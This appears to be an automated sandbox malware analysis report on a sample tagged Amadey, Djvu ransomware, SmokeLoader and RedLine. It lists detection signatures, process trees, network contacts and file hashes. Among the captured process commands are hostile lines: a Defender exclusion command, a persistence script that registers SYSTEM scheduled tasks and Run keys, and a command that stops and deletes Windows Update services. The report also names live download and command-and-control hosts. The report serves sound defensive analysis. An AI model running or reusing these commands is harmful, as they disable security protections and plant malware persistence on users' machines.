Malware Analysis Report

2025-04-14 07:04

Sample ID 230723-m9pkgadh62
Target file.exe
SHA256 16bba5264817b4ada8bb227f8089b237396874620cc658ff62438420a79260ea
Tags
amadey djvu fabookie gcleaner redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor discovery infostealer loader ransomware spyware stealer themida trojan pub1 evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16bba5264817b4ada8bb227f8089b237396874620cc658ff62438420a79260ea

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu fabookie gcleaner redline smokeloader logsdiller cloud (tg: @logsdillabot) backdoor discovery infostealer loader ransomware spyware stealer themida trojan pub1 evasion

GCleaner

Amadey

SmokeLoader

Djvu Ransomware

Fabookie

Detected Djvu ransomware

Detect Fabookie payload

RedLine

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Modifies file permissions

Deletes itself

Themida packer

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-23 11:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-23 11:10

Reported

2023-07-23 11:12

Platform

win7-20230712-en

Max time kernel

30s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED10.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2BE7.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 608 set thread context of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1196 wrote to memory of 608 N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 1196 wrote to memory of 608 N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 1196 wrote to memory of 608 N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 1196 wrote to memory of 608 N/A N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 1196 wrote to memory of 2904 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2904 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2904 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2904 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2904 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2904 wrote to memory of 2916 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 1196 wrote to memory of 2360 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2360 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2360 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2360 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1196 wrote to memory of 2360 N/A N/A C:\Windows\system32\regsvr32.exe
PID 608 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\DFA5.exe C:\Users\Admin\AppData\Local\Temp\DFA5.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 2360 wrote to memory of 2736 N/A C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp\2BE7.exe
PID 1196 wrote to memory of 2716 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED10.exe
PID 1196 wrote to memory of 2716 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED10.exe
PID 1196 wrote to memory of 2716 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED10.exe
PID 1196 wrote to memory of 2716 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED10.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E235.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\E235.dll

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E5A0.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\E5A0.dll

C:\Users\Admin\AppData\Local\Temp\ED10.exe

C:\Users\Admin\AppData\Local\Temp\ED10.exe

C:\Users\Admin\AppData\Local\Temp\F51C.exe

C:\Users\Admin\AppData\Local\Temp\F51C.exe

C:\Users\Admin\AppData\Local\Temp\1319.exe

C:\Users\Admin\AppData\Local\Temp\1319.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\c78a5f6c-2e15-4f56-a373-b9daba6cb63b" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

"C:\Users\Admin\AppData\Local\Temp\DFA5.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

"C:\Users\Admin\AppData\Local\Temp\DFA5.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1000357001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000357001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\3338.exe

C:\Users\Admin\AppData\Local\Temp\3338.exe

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {808ECCA6-96B3-4BB6-AEA1-08F49C1B461C} S-1-5-21-2969888527-3102471180-2307688834-1000:YKQDESCX\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

"C:\Users\Admin\AppData\Local\Temp\2BE7.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

"C:\Users\Admin\AppData\Local\Temp\2BE7.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

"C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

"C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe"

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

"C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

"C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000357001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

"C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"

C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\44caf79e-0bbb-46ef-918f-291e33fb19b6\build2.exe

"C:\Users\Admin\AppData\Local\44caf79e-0bbb-46ef-918f-291e33fb19b6\build2.exe"

C:\Users\Admin\AppData\Local\44caf79e-0bbb-46ef-918f-291e33fb19b6\build3.exe

"C:\Users\Admin\AppData\Local\44caf79e-0bbb-46ef-918f-291e33fb19b6\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Local\Temp\1000359001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000359001\3eef203fb515bda85f514e168abb5973.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 potunulit.org udp
US 188.114.96.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
KW 168.187.75.100:80 colisumy.com tcp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
PS 213.6.54.58:443 nordskills.eu tcp
DE 45.9.74.80:80 45.9.74.80 tcp
KW 168.187.75.100:80 colisumy.com tcp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
NL 45.66.230.149:80 45.66.230.149 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 files.catbox.moe udp
FR 178.32.90.250:29608 tcp
FR 178.32.90.250:29608 tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
KW 168.187.75.100:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 220.82.134.215:80 zexeq.com tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
KR 220.82.134.215:80 zexeq.com tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
NL 45.12.253.56:80 45.12.253.56 tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 t.me udp
CA 108.181.20.35:443 files.catbox.moe tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 92.122.63.136:443 steamcommunity.com tcp
CA 108.181.20.35:443 files.catbox.moe tcp
KW 168.187.75.100:80 colisumy.com tcp
KR 220.82.134.215:80 zexeq.com tcp
CA 108.181.20.35:443 files.catbox.moe tcp
CA 108.181.20.35:443 files.catbox.moe tcp

Files

memory/2316-55-0x0000000002560000-0x0000000002660000-memory.dmp

memory/2316-56-0x0000000000230000-0x0000000000239000-memory.dmp

memory/2316-57-0x0000000000400000-0x000000000246F000-memory.dmp

memory/1196-58-0x0000000003DC0000-0x0000000003DD6000-memory.dmp

memory/2316-62-0x0000000000230000-0x0000000000239000-memory.dmp

memory/2316-59-0x0000000000400000-0x000000000246F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\Temp\E235.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/608-74-0x0000000002560000-0x00000000025F1000-memory.dmp

memory/608-75-0x0000000002560000-0x00000000025F1000-memory.dmp

memory/608-76-0x0000000003D30000-0x0000000003E4B000-memory.dmp

memory/2916-78-0x0000000000A70000-0x0000000000BA4000-memory.dmp

\Users\Admin\AppData\Local\Temp\E235.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

\Users\Admin\AppData\Local\Temp\DFA5.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2856-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2856-84-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2916-88-0x0000000000A70000-0x0000000000BA4000-memory.dmp

memory/2856-90-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2916-89-0x0000000000130000-0x0000000000136000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E5A0.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

C:\Users\Admin\AppData\Local\Temp\DFA5.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2856-92-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\E5A0.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
